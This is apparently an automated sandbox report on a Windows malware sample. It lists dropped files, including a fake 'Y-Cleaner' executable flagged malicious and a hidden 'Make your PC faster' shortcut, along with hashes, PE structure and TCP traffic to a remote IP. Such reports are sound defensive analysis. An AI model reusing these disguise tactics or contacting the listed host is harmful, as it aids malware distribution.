                                                                  SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                  Malicious:false
                                                                  Preview:0

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\soft[1]

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1502720
                                                                  Entropy (8bit):7.646111739368707
                                                                  Encrypted:false
                                                                  SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                                                  MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                                                  SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                                                  SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                                                  SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 75%
                                                                  Joe Sandbox View:
                                                                  • Filename: 8V0INSl0E2.exe, Detection: malicious, Browse
                                                                  • Filename: BEd2lJRXFM.exe, Detection: malicious, Browse
                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\fuckingdllENCR[1].dll

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):97296
                                                                  Entropy (8bit):7.9982317718947025
                                                                  Encrypted:true
                                                                  SSDEEP:1536:A1FazaNKjs9ezO6kGnCRFVjltPjM9Ew1MhiIeJfZCQdOlnq32YTCUZiyAS3tUX9F:k4zaMjVUGCRzbgqw1MoIeJyQ4nyqX9F
                                                                  MD5:E6743949BBF24B39B25399CD7C5D3A2E
                                                                  SHA1:DBE84C91A9B0ACCD2C1C16D49B48FAEAEC830239
                                                                  SHA-256:A3B82FC46635A467CC8375D40DDBDDD71CAE3B7659D2BB5C3C4370930AE9468C
                                                                  SHA-512:3D50396CDF33F5C6522D4C485D96425C0DDB341DB9BD66C43EAE6D8617B26A4D9B4B9A5AEE0457A4F1EC6FAC3CB8208C562A479DCAE024A50143CBFA4E1F15F6
                                                                  Malicious:false
                                                                  Preview:XM .4Ih..]...t.&.s...v.0{.v.vs'...:.l.h...e.....R....1...r.R+Fk*....~.s.....Q.....r.T.b.....~c..[........;...j.@.0.%.....x...v.w.....<ru....Yre;.b6...HQ-...8.B..Q.a...R.:.h&r.......=.;r.k..T.@....l..;#..3!.O..x.}........y'<.GfQ.K.#.L5v..].......d....N{e..@................A\..<.t.u.X.O.n..Z.. .Xb.O<.*Z...h~.(.W.f.z.V.4..L...%5.0...H..`s...y.B......(IL5s:aS}X.......M9.J.o....).'..M;n6]...W..n....)...L...._..e.....>....[....RA.........'...6.N..g6....IY.%h.. 3r....^..\.b~y./....h.2......ZLk....u}..V..<.fbD.<!.._2.zo..IE...P..*O...u......P.......w#.6N..&l.R}GI...LY...N.yz..j..Hy.'..._.5..Pd9.y..+....6.q*...).G.c...L#....5\.M....5U])....U(..~H.m....Y....G1.r.4.B..h........P..]i...M%.............)q......]....~|..j...b..K!..N.7R.}T.2bsq..1...L^..!.|q.D'...s.Ln...D@..bn%0=b.Q1.....+l...QXO|.......NC.d......{.0....8F.....<.W.y..{o..j.3.....n..4.....eS]. K...o.B.H~.sh.1....m8....6{.ls..R..q..~....w._;....X*.#..U....6n.ODbT.+Zc....q....S.$-S`YT....

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\download[1].htm

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:V:V
                                                                  MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                  SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                  SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                  SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                  Malicious:false
                                                                  Preview:0

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\key[1].htm

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):21
                                                                  Entropy (8bit):3.880179922675737
                                                                  Encrypted:false
                                                                  SSDEEP:3:gFsR0GOWW:gyRhI
                                                                  MD5:408E94319D97609B8E768415873D5A14
                                                                  SHA1:E1F56DE347505607893A0A1442B6F3659BEF79C4
                                                                  SHA-256:E29A4FD2CB1F367A743EA7CFD356DBD19AEB271523BBAE49D4F53257C3B0A78D
                                                                  SHA-512:994FA19673C6ADC2CC5EF31C6A5C323406BB351551219EE0EEDA4663EC32DAF2A1D14702472B5CF7B476809B088C85C5BE684916B73046DA0DF72236BC6F5608
                                                                  Malicious:false
                                                                  Preview:9tKiK3bsYm4fMuK47Pk3s

                                                                  C:\Users\user\AppData\Local\Temp\eDe4265J80SwdwreJA5DKe\Bunifu_UI_v1.5.3.dll

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):214000
                                                                  Entropy (8bit):6.5511536448557735
                                                                  Encrypted:false
                                                                  SSDEEP:3072:Z5G1b0q6QpxILDXGGMOmMjMpI6qe9C5jwQw2hWHcH0:SIQpxILDXGGMO7Ice9C5kQw2hWHcH0
                                                                  MD5:6F0C19CD2E68B52C50BFD34A733C3524
                                                                  SHA1:3542EEC360C3812863D28A12AF96C31BC9CC0164
                                                                  SHA-256:7EA56914148B572BAAADA38008CD70846A7240737B242BC8AC421531EF347632
                                                                  SHA-512:F9DAAF33BA25E5046CB459AB9D4198BCD3ACCC738C5E127D7B8FDC25FC18FF966B569747B241CA8DA1DFE0066E8D443B950019D31BD96A9D901D9FE4167190EC
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...

                                                                  C:\Users\user\AppData\Local\Temp\eDe4265J80SwdwreJA5DKe\Y-Cleaner.exe

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1502720
                                                                  Entropy (8bit):7.646111739368707
                                                                  Encrypted:false
                                                                  SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                                                  MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                                                  SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                                                  SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                                                  SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 75%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

                                                                  C:\Users\user\Desktop\Cleaner.lnk

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Fri Dec 20 14:24:02 2024, mtime=Fri Dec 20 14:24:02 2024, atime=Fri Dec 20 14:24:02 2024, length=1502720, window=hide
                                                                  Category:dropped
                                                                  Size (bytes):2191
                                                                  Entropy (8bit):3.8707374337748166
                                                                  Encrypted:false
                                                                  SSDEEP:24:8dLs/e8RmgKzjaGUAKfloIvNQM9oO4ZloOqxgxjNrNHqyFm:81cxRueKG5vNQM9oZhqupNrNKyF
                                                                  MD5:7E2F8A39ADA00DFAE676AD87D04F56B9
                                                                  SHA1:946B866A4630823C8C332AFE385421A123A9AA87
                                                                  SHA-256:1E35380104E910B8D5CFDEFD2D2C5C69718C81DE186C4C875499E74AC0963484
                                                                  SHA-512:3330D89F6394AD6167CFCC42E644176E268018CDB5B47524DBC409207995A1E1136FFE61FD744134B0109FDE8687CD41074DF56D6FA11E461B9BE8E70E1ECBBF
                                                                  Malicious:false
                                                                  Preview:L..................F.@.. ....'.3.R...'.3.R...'.3.R..........................:.:..DG..Yr?.D..U..k0.&...&......vk.v...._.7..R.....3.R......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.z...........................%..A.p.p.D.a.t.a...B.P.1......Y.z..Local.<......CW.^.Y.z....b.......................^.L.o.c.a.l.....N.1......Y.z..Temp..:......CW.^.Y.z....l.....................eB..T.e.m.p.....v.1......Y.z..EDE426~1..^......Y.z.Y.z..............................e.D.e.4.2.6.5.J.8.0.S.w.d.w.r.e.J.A.5.D.K.e.....h.2......Y.{ .Y-CLEA~1.EXE..L......Y.{.Y.{....R.........................Y.-.C.l.e.a.n.e.r...e.x.e.......u...............-.......t............).y.....C:\Users\user\AppData\Local\Temp\eDe4265J80SwdwreJA5DKe\Y-Cleaner.exe....M.a.k.e. .y.o.u.r. .P.C. .f.a.s.t.e.r.:.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.e.D.e.4.2.6.5.J.8.0.S.w.d.w.r.e.J.A.5.D.K.e.\.Y.-.C.l.e.a.n.e.r...e.x.e.F.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.e.D.e.4

                                                                  C:\Windows\appcompat\Programs\Amcache.hve

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                  Category:dropped
                                                                  Size (bytes):1835008
                                                                  Entropy (8bit):4.465456716179802
                                                                  Encrypted:false
                                                                  SSDEEP:6144:sIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNrdwBCswSb9:RXD94+WlLZMM6YFHN+9
                                                                  MD5:FAB83FD871BB6ADE561AA1FD9311DBBF
                                                                  SHA1:B64821643F47CC6E0D3B948659A59776BEE038EF
                                                                  SHA-256:2C64384B077C49D4D76C5E39278BAC1E0605DEDA93535896DB54313557ED2A49
                                                                  SHA-512:D0D0A6F5899A6B47C1875A4E06D1DD90622C5F5AB0D8639C457D9D5BBEB8D6FEB13B368364BCA7EDF763AD989F88864EF7AF9B7BEFD3D63FF69DC57B3C0988D4
                                                                  Malicious:false
                                                                  Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.ql3.R................................................................................................................................................................................................................................................................................................................................................{.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.940815632628404
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:zmTSHkabY6.exe
                                                                  File size:1'945'088 bytes
                                                                  MD5:cab7af24073c5c1c62a2957dd5983c98
                                                                  SHA1:a41a42e84999503cf76b04edefe3c37f87023285
                                                                  SHA256:83709123b921be43ef4f8bcab88738b7e3f6b810fb443da8f447a287fa5d86ae
                                                                  SHA512:ab369b7290203e5fbbaa67a84fcac6325d1460e5696a8d6c54595cf85a1e63b5fb513e5bc8bc5fdf17dce02431c2368a5faefeee131c879085a340844734c6e8
                                                                  SSDEEP:49152:/4bMkF3zAefWvY4WxDwLPDCH/ixLCDTni2zfkwNMb:wQkF3zAeuvYhDy2H/iLCDTni2zu
                                                                  TLSH:B99533A21E93D8A4EDB00573716B8A6779C2B018D540AB6FE688D71DDDB31D3E243B1C
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i..............nG@......ZR......ZC......ZU......................Z\......ZB......ZG.....Rich....................PE..L....,.e...

                                                                  File Icon

                                                                  Icon Hash:e7a99a8a8651790c

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0xc5e000
                                                                  Entrypoint Section:.taggant
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x65B12CA8 [Wed Jan 24 15:28:40 2024 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:5
                                                                  OS Version Minor:0
                                                                  File Version Major:5
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:5
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  jmp 00007F98986A31CAh
                                                                  jl 00007F98986A31E3h
                                                                  add byte ptr [eax], al
                                                                  jmp 00007F98986A51C5h
                                                                  add byte ptr [ebx], al
                                                                  or al, byte ptr [eax]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], dh
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax+eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  and al, byte ptr [eax]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  or byte ptr [eax+00000000h], al
                                                                  add byte ptr [eax], al
                                                                  adc byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add ecx, dword ptr [edx]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al

                                                                  Rich Headers

                                                                  Programming Language:
                                                                  • [C++] VS2008 build 21022
                                                                  • [ASM] VS2008 build 21022
                                                                  • [ C ] VS2008 build 21022
                                                                  • [IMP] VS2005 build 50727
                                                                  • [RES] VS2008 build 21022
                                                                  • [LNK] VS2008 build 21022

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x41805b0x6f.idata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x40d0000xaea0.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x85589c0x18mimgnztd
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  0x10000x40c0000x24e00d2a2e18332da2cb0f93d9ef5cedbf9cfunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rsrc0x40d0000xaea00x700072332cb18b74711f6db3d69a316efdd0False0.9675990513392857data7.897656971407287IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .idata 0x4180000x10000x200b8539b83d0b3f253ed2a56b71af0554bFalse0.154296875data1.085758102617974IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  0x4190000x2980000x20069a10050e9b393cfa3c0e61fa5aed286unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  mimgnztd0x6b10000x1ac0000x1ab60065f0f49848bad21dc900040979c56bfaFalse0.9899864498025739data7.947730998913052IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  korrylev0x85d0000x10000x4006708767d8c3e730ce3ece8b9b5599802False0.7939453125data6.232159219538265IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .taggant0x85e0000x30000x2200177d20ab148622e0d3749ccaac2139e8False0.06410845588235294DOS executable (COM)0.7663392544881751IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_ICON0x8558fc0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkmenTurkmenistan0.7971748400852878
                                                                  RT_ICON0x8567a40x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkmenTurkmenistan0.7838447653429603
                                                                  RT_ICON0x85704c0x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkmenTurkmenistan0.7200460829493087
                                                                  RT_ICON0x8577140x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkmenTurkmenistan0.740606936416185
                                                                  RT_ICON0x857c7c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkmenTurkmenistan0.6840248962655602
                                                                  RT_ICON0x85a2240x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkmenTurkmenistan0.7345215759849906
                                                                  RT_ICON0x85b2cc0x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkmenTurkmenistan0.7622950819672131
                                                                  RT_ICON0x85bc540x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkmenTurkmenistan0.8111702127659575
                                                                  RT_STRING0x413c800x330data0.8345588235294118
                                                                  RT_STRING0x413fb00x170data0.15
                                                                  RT_STRING0x4141200x620empty0
                                                                  RT_STRING0x4147400x762empty0
                                                                  RT_STRING0x414ea40x852empty0
                                                                  RT_STRING0x4156f80x726empty0
                                                                  RT_STRING0x415e200x658empty0
                                                                  RT_STRING0x4164780x6c0empty0
                                                                  RT_STRING0x416b380x638empty0
                                                                  RT_STRING0x4171700x88aempty0
                                                                  RT_ACCELERATOR0x4179fc0x20empty0
                                                                  RT_GROUP_ICON0x85c0bc0x76dataTurkmenTurkmenistan0.6610169491525424
                                                                  RT_VERSION0x85c1320x1b4data0.5711009174311926
                                                                  RT_MANIFEST0x85c2e60x256ASCII text, with CRLF line terminators0.5100334448160535

                                                                  Imports

                                                                  DLLImport
                                                                  kernel32.dlllstrcpy

                                                                  Possible Origin

                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  TurkmenTurkmenistan

                                                                  Network Behavior

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 20, 2024 16:23:13.670953035 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:13.790829897 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:13.791055918 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:13.792112112 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:13.911628008 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:15.261161089 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:15.261239052 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:15.277766943 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:15.397737980 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:15.794322968 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:15.794465065 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:15.801570892 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:15.921921968 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.702380896 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.702459097 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.702471972 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.702548027 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.702754974 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.702816010 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.702827930 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.702841043 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.702852964 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.703347921 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.703347921 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.703383923 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.703480959 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.711236000 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.711343050 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.711606026 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.711776972 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.719445944 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.719531059 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.719800949 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.720088005 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.896787882 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.896891117 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.896935940 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.897011042 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.900500059 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.900568962 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.900634050 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.900687933 CET4974780192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:23:16.908478975 CET8049747185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:23:16.908663034 CET8049747185.156.73.23192.168.2.4
